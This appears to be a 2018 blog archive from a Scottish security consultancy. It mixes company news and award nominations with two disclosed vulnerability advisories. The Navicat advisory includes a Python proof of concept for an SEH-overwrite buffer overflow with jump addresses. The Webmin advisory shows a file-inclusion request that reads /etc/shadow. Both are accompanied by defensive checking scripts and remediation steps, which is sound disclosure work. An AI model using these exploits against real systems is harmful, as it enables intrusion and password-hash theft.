Archives for 2018

Scottish SMEs and Third Sector Organisations Eligible for CE and CE Plus Vouchers

In June of this year, the Scottish Government set out their ongoing commitment to developing the Safe, Secure and Prosperous: A Cyber Resilience Strategy for Scotland. As part of this, they have made £500,000 available under the National Cyber Security Programme for a voucher scheme to support small and medium-sized private and third sector organisations in Scotland. Funding is to enable those organisations to achieve the National Cyber Security Centre (NCSC) endorsed Cyber Essentials or Cyber Essentials Plus certificate.

Organisations can apply for the grant funding online and if approved will be eligible to access the money once they have achieved the Cyber Essentials accreditation. As an independent technical information assurance consultancy, 7 Elements is well placed to support your organisation through the process of gaining Cyber Essentials certification. All of our staff are highly technical and therefore our Cyber Essentials assessors are well qualified to assist you through the process. More information on the Cyber Essentials process can be found here: https://www.7elements.co.uk/services/cyber-essentials/

As of today (7th November 2018), the scheme is live and you can apply for your voucher of up to £1000 to achieve Cyber Essentials certification. The scheme will run for 12 months or until the vouchers have been exhausted.

Scotland based small and medium-sized private sector organisations can apply via a portal on the Scottish Enterprise website below:
https://www.scottish-enterprise.com/

Third sector organisations can apply via a portal on the Scottish Council Voluntary Organisations (SCVO) website below:
https://scvo.org.uk/digital/

Best Customer Experience Award Nomination 2018

We are thrilled to have been nominated for the ‘Best Customer Experience’ award at the 2018 Scottish Cyber Awards!

The Scottish Cyber Awards are back for their third year, and we are delighted to have been nominated for the ‘Best Customer Experience’ award. This nomination means even more to us because all recommendations are from end-users that had directly utilised the services of a Scottish based cyber security organisation, which is a massive honour. We are delighted to be in such good company with Quorum Cyber and Seric Systems.

The customer experience award aims to credit organisations who are dedicated to providing outstanding service. Companies who have gone over and above what is expected to offer excellent service and act as a standard for organisations across the industry to aim for over the coming year (SBRC 2018).

David and his team are customer experience wizards – whenever I need their services, they’re there. Dependable, adaptive, clear and reliable. On all the engagements I’ve worked on with 7 Elements I’ve been impressed by David and his team’s responsiveness and capabilities. Genuine passion for the area rather than being sales driven. This goes a long way with me and I’ll keep going back to them on this basis. – 7 Elements Nomination

The winner of this award will be decided via public vote and we hope that we can rely on yours! Voting closes on the 30th October and you can place your votes here:

https://www.scottishcyberawards.co.uk

The winner will be announced at the awards dinner on the 28th November at the Sheraton Hotel.

ZoneFox Collaboration

We are excited to announce our recent partnership with ZoneFox, to enhance our award winning Incident Response Service.

At 7 Elements we work with clients across the globe, providing expertise in technical information assurance. We use an event-driven approach to Incident Response encompassing five key stages: situational awareness; establishing response parameters; resource deployment; establishing compromise zone and incident classification; followed by incident containment and remediation.

To enhance our situational awareness capability we have partnered with ZoneFox and will be able to deploy the ZoneFox agent as part of our initial response activity.

The ZoneFox solution monitors user behaviour and data movement both on-and-off-network, alerting against malicious or anomalous behaviour. This is achieved through user and entity behaviour analytics (UEBA) and intelligent machine-learning technology that provides 360 visibility across the network and beyond.

Jamie Graves, CEO, ZoneFox said: “Through our work with clients it is becoming increasingly clear that the majority are now using the platform as a cornerstone of their Incident Response strategy. The data and evidence the platform delivers to the business makes it easy to pinpoint vulnerabilities and devise a remediation plan. We’re delighted to be working with 7 Elements and this is definitely an area of the business we will be looking to grow.”

Threat Hunting

The slides from ‘Threat Hunting in the O365 Ecosystem’ given at the International Conference on Big Data in Cyber Security are now online and can be found here:

The video of the talk can be found here:

Navicat Premium Oracle Connection Buffer Overflow (SEH overwrite) Vulnerability

Advisory Information

Title: Navicat Premium Oracle Connection Buffer Overflow (SEH overwrite)

Date Published: 01/05/2018

Advisory Summary

Inputting an excessively long string of characters into the ‘host’ field when creating a new Oracle connection causes the program to crash. A lack of address space layout randomisation (ASLR) enabled within the software allows an attacker to reliably hijack the execution flow of the application.

Vendor

PremiumSoft CyberTech Ltd

Affected Software

Product: NaviCat Premium
Version: <= 12.0.26

Description of Issue

A buffer overflow vulnerability was discovered in NaviCat Premium version 12.0.26. This vulnerability was found in the “New Connection” component of the application. Entering an excessively long string into the host field of a new Oracle connection will cause the program to crash. This crash, combined with a lack of ASLR enabled within the application, allows an attacker to overwrite the structured exception handler (SEH) and hijack execution flow of the application. This issue was tested on a 32-bit Windows 7 host.

PoC

The following proof-of-concept Python script generates a text file containing a string that overwrites SEH. Once the file is generated, copy the contents of navicatPOC.txt and paste them into the host field of a new Oracle connection. Test the connection to trigger the crash.

#!/usr/bin/env python
# Title: Navicat < 12.0.27 Oracle Connection Overflow
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: https://www.navicat.com
# Date: 01/05/2018
# Version: 12.0.26
# Tested on Windows 7 32-bit
# Vendor notified on 04/04/2018. Patch issued on 25/04/2018.

# Generate file > Create new Oracle Connection > paste contents of "navicatPOC.txt" into host field and test connection to trigger overflow.
filename = "navicatPOC.txt"
junk = "A" * 1502          # padding up to the SEH record
#nseh = "\x4C\x4C\x77\x04"
#seh = "\x75\x2a\x01\x10"
nseh = "B" * 4             # marker bytes landing on the next-SEH pointer
seh = "C" * 4              # marker bytes landing on the handler pointer
fill = "D" * 4000          # area following the SEH record
payload = junk + nseh + seh + fill
with open(filename, 'w') as textfile:
    textfile.write(payload)

This will result in an SEH overwrite, as demonstrated by the following screenshot:

SEH Overwrite

From here, we can replace the SEH handler address with the address of a POP POP RET sequence, located at 0x10012a75:

seh= "\x75\x2a\x01\x10"

And replace nSEH with the following code to jump to our payload:

nseh = "\x4C\x4C\x77\x04"

This lands in the payload, represented in the proof of concept by the character ‘D’ (\x44).
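The root cause the advisory relies on is an image built without ASLR. The following Python 3 script is an added example, not part of the advisory or of Navicat: it reads the DllCharacteristics field of a PE optional header and reports whether the image opts into ASLR (DYNAMIC_BASE), DEP (NX_COMPAT), high-entropy 64-bit ASLR and Control Flow Guard. The flag values are the IMAGE_DLLCHARACTERISTICS_* constants from winnt.h; the sample image is constructed inside the script (no Navicat binary is shipped with this page), and the script also accepts a path on the command line.

```python
#!/usr/bin/env python3
"""Report which exploit-mitigation flags a PE image opts into.

Added example for the advisory above, not project code. Reads the
IMAGE_OPTIONAL_HEADER.DllCharacteristics field, where a Windows image
declares its compatibility with ASLR, DEP and related mitigations.
"""
import struct
import sys

# Bit values from IMAGE_DLLCHARACTERISTICS_* in winnt.h
IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA = 0x0020
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100
IMAGE_DLLCHARACTERISTICS_GUARD_CF = 0x4000

PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B
DLLCHARACTERISTICS_OFFSET = 70  # same offset within PE32 and PE32+ optional headers


def pe_mitigations(data: bytes) -> dict:
    """Parse the headers of a PE image and return its mitigation opt-ins."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (size_of_optional,) = struct.unpack_from("<H", data, coff + 16)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    if size_of_optional < DLLCHARACTERISTICS_OFFSET + 2:
        raise ValueError("optional header too short")
    (dllchars,) = struct.unpack_from("<H", data, opt + DLLCHARACTERISTICS_OFFSET)
    return {
        "pe32plus": magic == PE32PLUS_MAGIC,
        "aslr": bool(dllchars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(dllchars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "high_entropy_va": bool(dllchars & IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA),
        "cfg": bool(dllchars & IMAGE_DLLCHARACTERISTICS_GUARD_CF),
    }


def build_sample_pe32(dllcharacteristics: int) -> bytes:
    """Constructed, header-only PE32 image (no sections) for offline demonstration."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # COFF header: Machine=i386, 0 sections, timestamp, symtab ptr, nsyms,
    # SizeOfOptionalHeader=224, Characteristics=EXECUTABLE_IMAGE|32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x014C, 0, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 28, 0x10000000)  # ImageBase; fixed unless ASLR is opted in
    struct.pack_into("<H", opt, 68, 2)           # Subsystem: Windows GUI
    struct.pack_into("<H", opt, 70, dllcharacteristics)
    return dos + b"PE\0\0" + coff + bytes(opt)


def check_file(path: str) -> dict:
    """Convenience wrapper: report mitigations for an image on disk."""
    with open(path, "rb") as fh:
        return pe_mitigations(fh.read())


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(check_file(sys.argv[1]))
    else:
        samples = (
            ("no mitigations", 0),
            ("ASLR+DEP", IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        )
        for label, flags in samples:
            print(label, pe_mitigations(build_sample_pe32(flags)))
```

SafeSEH is recorded in the image's load configuration directory rather than in DllCharacteristics, so this script does not report it; an image that reports aslr False here is one where the fixed base address assumed by the proof of concept will hold across runs.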

Remediation

This issue has been patched and the patch notes can be found here.

The latest version of Navicat Professional can be found on the Navicat website.

Timeline

Advisory sent – 4th April 2018

Requested confirmation that advisory has been received by Navicat – 9th April 2018

Confirmation of the issue by Navicat – 9th April 2018

Patch released by Navicat – 26th April 2018

Advisory published by 7 Elements – 1st May 2018

DL100 Cyber Resilience Innovation of the Year

7 Elements shortlisted in DL100 Cyber Resilience Innovation of the Year category for second year!

7 Elements are delighted that our Incident Response Partnership has been shortlisted for the second year in a row in the DL100 Cyber Resilience Innovation of the Year category. We are very proud of our incident response service and are excited by the external recognition we are gaining from our peers!

What makes our approach different? In short, no up-front costs and establishing a robust partnership model that delivers when needed. Our partnership clients only ever pay for effort that they use and based on agreed upfront costs, so that there are no unwelcome surprises.

David Stubley, CEO 7 Elements

Positive and robust cyber resilience is now a fundamental business enabler. The ability of organised criminal gangs and motivated attackers to target organisations via the Internet has increased to a level where they are capable of executing attacks with little financial outlay that can result in huge financial gain for them, while causing both financial loss and reputational damage for the targeted organisation. Even non-targeted attacks can have catastrophic consequences and result in downtime and financial loss. Having a robust approach to incident response that is both flexible and proportional is now a key requirement for any organisation doing business online. Our incident response partnership is designed to give SMEs access to the same level of incident response services as blue-chip companies without the high costs.

Recent feedback from one of our clients dealing with a breach that resulted in financial loss:

We engaged 7 Elements to help us while dealing with a recent security issue. We found them to be extremely responsive and able to present their findings with real clarity, together with a comprehensive step-by-step plan which, on implementation, allowed us to give confidence to our Board and shareholders that the issues were not only understood but that all measures had been taken to ensure that there would be no repeat in future. We would recommend anyone not to rely solely on their IT provider, but to obtain advice on security from an expert, as prevention is the best cure and compromising on cybersecurity can prove extremely costly. We continue to work with David and his team at 7 Elements and cannot recommend them highly enough.

CFO, Commercial Property Developer


If you would like to know more and get on the front foot when dealing with cyber security incidents, then get in touch with the team.

As of the 12th April 2018, voting has now opened for each of the DL100 categories and we would like to take this opportunity to ask for your vote.

The DL100 winners will be announced at the awards dinner on the 21st June at the Sheraton Grand in London.


More information on our Incident Response Partnership can be found here.

International Conference of Big Data in Cyber Security

Our CEO, David Stubley, will be speaking in Edinburgh at the International Conference on Big Data in Cyber Security on the 31st May 2018 at Napier University. With the threats to organisations increasing day by day, many organisations are moving towards SIEM (Security Information and Event Management) to detect malicious activity. SIEM is now being applied in many different processes across the industry, including security monitoring, incident response and cyber crime investigation.

The big data conference brings together industry, academia and law enforcement to share insights, ideas, expertise and resources in responding to current security challenges, and to look at the opportunities and challenges in managing and using big data in a cyber security context. The conference also aims to showcase good practice in industry and network investigations.

The conference hopes to cover the following areas:

  • insights into current high-profile security incidents, their impact, and how they are reported.
  • impact of GDPR.
  • key threats and risks associated with losing business critical data.
  • leading tools, techniques and insights in network threat analysis, detection and investigation.
  • best practice in implementing SIEM strategy.
  • developing and testing effective incident response.
  • evolution of the Security Operations Centre (SOC) and its emerging future requirements.
  • the need for skills, knowledge and awareness across an organisation.
  • latest research and innovation around threat discovery, machine learning, and data analysis.

David Stubley will be discussing ‘threat hunting in the Office 365 ecosystem’ at 2 pm in the Lindsay Stewart Theatre.

If you would like to know more about how we approach incident response, then please get in touch with our team.

Webmin 1.840 – 1.880 – Unrestricted Access to Arbitrary Files using Local File Include

Advisory Information

Title: Webmin 1.840 – 1.880 – Unrestricted Access to Arbitrary Files Using Local File Include

Date Published: 14/03/2018

Advisory Summary

The application allows a restricted Linux user to obtain arbitrary local system files via a Local File Include vulnerability.

Vendor

Webmin

Affected Software

Product: Webmin
Version: 1.840 & 1.880

Description of Issue

In a default installation of Webmin 1.840/1.880, Unix server users who are otherwise restricted from reading root-level or system files are able to read those files through Webmin. As a result of weak default configuration settings, limited users have full read access to the underlying Unix system files, allowing them to read sensitive data from the local system such as ‘/etc/shadow’.

PoC

The following GET request shows the use of a direct URL to obtain local files through the Local File Include vulnerability:

GET /syslog/save_log.cgi?view=1&file=/etc/shadow HTTP/1.1
Host: 192.168.75.150:10000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
The Webmin application server responds with a ‘200 OK’ and includes the file normally restricted to limited users of the system:

HTTP/1.0 200 Document follows
Date: Thu, 8 Mar 2018 20:41:28 GMT
Server: MiniServ/1.880
Connection: close

proxy:*:17288:0:99999:7:::
www-data:*:17288:0:99999:7:::
mysql:!:17542:0:99999:7:::
opsview:!:17542::::::
nagios:!:17542::::::
snmp:*:17542:0:99999:7:::
admin:$1$**SNIP**/5sl29PP0a.:17542:0:99999:7:::

The following screenshot shows the web view display of the file loaded:

Webmin default configuration

A number of settings exist within the Webmin Administrator control panel to restrict users from accessing sensitive system files. However, by default, these settings are not enforced when a new installation of Webmin 1.840/1.880 is deployed within an environment. Of specific note is the setting that enables any file to be viewed as a log file. The default value of this setting within the Webmin server is ‘yes’. This allows the restricted user to load sensitive system files via the Local File Include function of the web application.
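Because the default configuration lets the System Logs module read any file, an administrator who cannot change the setting immediately will at least want to see such reads in the web server log. The Python 3 script below is an added example, not part of the advisory or of Webmin: it parses combined-format access log lines (the sample lines are constructed, and the line format is an assumption; the miniserv.log layout on a given install may differ), extracts the file parameter from requests to /syslog/save_log.cgi, normalises the path so that a traversal such as /var/log/../../etc/passwd resolves to its real target, and flags any read outside the log directories listed in ALLOWED_LOG_DIRS.

```python
#!/usr/bin/env python3
"""Flag Webmin System Logs requests that read files outside the usual log locations.

Added example for the advisory above, not Webmin code. Assumes a combined-format
access log; the SAMPLE_LOG lines are constructed for offline demonstration.
"""
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Directories a legitimate "view log" request is expected to stay within (assumption).
ALLOWED_LOG_DIRS = ("/var/log/",)

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample: two reads outside /var/log, one legitimate log view, one unrelated page.
SAMPLE_LOG = """\
192.168.75.1 - limited [08/Mar/2018:20:41:28 +0000] "GET /syslog/save_log.cgi?view=1&file=/etc/shadow HTTP/1.1" 200 1532
192.168.75.1 - limited [08/Mar/2018:20:42:01 +0000] "GET /syslog/save_log.cgi?view=1&file=/var/log/syslog HTTP/1.1" 200 40211
192.168.75.1 - limited [08/Mar/2018:20:43:10 +0000] "GET /syslog/save_log.cgi?view=1&file=/var/log/../../etc/passwd HTTP/1.1" 200 2048
192.168.75.1 - admin [08/Mar/2018:20:44:00 +0000] "GET /syslog/index.cgi HTTP/1.1" 200 9000
"""


def parse_line(line: str):
    """Split one access-log line into its fields, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def requested_file(target: str):
    """Return the 'file' parameter of a save_log.cgi request, or None for other requests."""
    parts = urlsplit(target)
    if not parts.path.endswith("/syslog/save_log.cgi"):
        return None
    files = parse_qs(parts.query).get("file")  # parse_qs already percent-decodes
    return files[0] if files else None


def is_outside_log_dirs(path: str) -> bool:
    """True when the normalised path is not under an allowed log directory."""
    norm = posixpath.normpath(path)
    if not norm.startswith("/"):
        return True  # relative paths are resolved server-side; treat as out of policy
    return not any(norm.startswith(d) for d in ALLOWED_LOG_DIRS)


def find_suspicious(lines):
    """Return one record per save_log.cgi request that reads outside the log directories."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        requested = requested_file(rec["target"])
        if requested is None or not is_outside_log_dirs(requested):
            continue
        hits.append({
            "user": rec["user"],
            "ip": rec["ip"],
            "file": posixpath.normpath(requested),
            "status": int(rec["status"]),
        })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG.splitlines()):
        print("out-of-policy log read:", hit)
```

A status of 200 on a flagged line means the file was actually returned, which is the case the advisory describes; after the workaround below is applied, the same request should no longer succeed, so the script doubles as a check that the setting took effect.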

Remediation

The issue has not been patched yet.

Workaround

Administrators of Webmin server should manually set the following access control options within the configuration to further protect sensitive system files from being read by otherwise restricted users.

Webmin > Webmin Users > Webmin Groups > Select Group  > Available Webmin Modules > System Logs

  • Can view any files as a log? – ‘No’


Timeline

  • Initial email contact to vendor via security email address noted on website – 8th March 2018.

  • Email reply from Webmin explaining that Webmin users have root-equivalent access to the underlying system, and advising that the directories users can access via Webmin be restricted – 9th March 2018.

  • Email reply to Webmin advising that the measures described in the previous reply do not limit access to restricted files, with a walkthrough of the issue in simpler steps – 9th March 2018.

  • Further email to Webmin explaining that “Can view any file as a log” is the only setting that prevents restricted users from viewing arbitrary files via Webmin – 9th March 2018.

  • Additional email to Webmin explaining that the ‘referer_none=1’ default setting, which prohibits access on default installations of Webmin, can be bypassed using the Referer HTTP header – 9th March 2018.

  • Email reply from Webmin confirming that the setting “Can view any files as a log” will prohibit user access to sensitive files – 9th March 2018.

  • Email to Webmin explaining that the issue exists in version 1.880, that it is advisable to change the default configuration of Webmin to restrict the setting “Can view any file as a log”, and that a blog post will be made available to the wider community informing them of the issue, to further protect system administrators from arbitrary file access to the system – 10th March 2018.

  • Reply from Webmin agreeing that permissions in Webmin are different to what you would expect from Linux and that a blog post would be useful – 11th March 2018.

  • Advisory Released – 14th March 2018